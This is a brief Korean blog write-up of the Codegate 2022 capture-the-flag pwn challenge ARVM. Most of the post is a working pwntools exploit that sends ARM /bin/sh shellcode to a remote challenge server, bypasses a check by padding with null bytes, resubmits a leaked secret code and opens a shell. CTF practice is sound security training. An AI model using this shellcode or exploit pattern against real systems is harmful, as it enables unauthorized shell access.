Codegate 2022 - PWN(ARVM)

CTF-Writeup 2022. 2. 28. 23:59

728x90

직접 푼 문제

from pwn import *

context.log_level='debug'
p = remote('15.165.92.159', 1234)
#p = remote('localhost', 1234)

#gdb.attach(p)
test_shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78"
p.sendafter('> ', "\x00"*0x10+test_shellcode + "A"*(0x90-len(test_shellcode)))
p.sendlineafter('> ', '1')

p.recvuntil('code : ')
secret_code = int(p.recvuntil('\n'), 16)
log.info('secret code : ' + hex(secret_code))
p.sendlineafter('Code? :> ', hex(secret_code))
p.interactive()

쉘코드는 인터넷에서 /bin/sh 쉘코드를 땄고

3으로 and하는 부분 우회하고 앞에 그냥 널 넣고 했더니 됨..

728x90

'CTF-Writeup' 카테고리의 다른 글

Killer Queen CTF 2021 Write-Up (0)	2021.10.30
2021 TSG CTF Write-up (0)	2021.10.05
ACSC(Asia Cyber Security Challenge) 2021 Writeup (0)	2021.09.19
2021 tamuctf Writeup (0)	2021.09.17
Grabcon2021 Write-up (0)	2021.09.17

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

Rasser

Rasser :: Rasser

Codegate 2022 - PWN(ARVM)

'CTF-Writeup' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역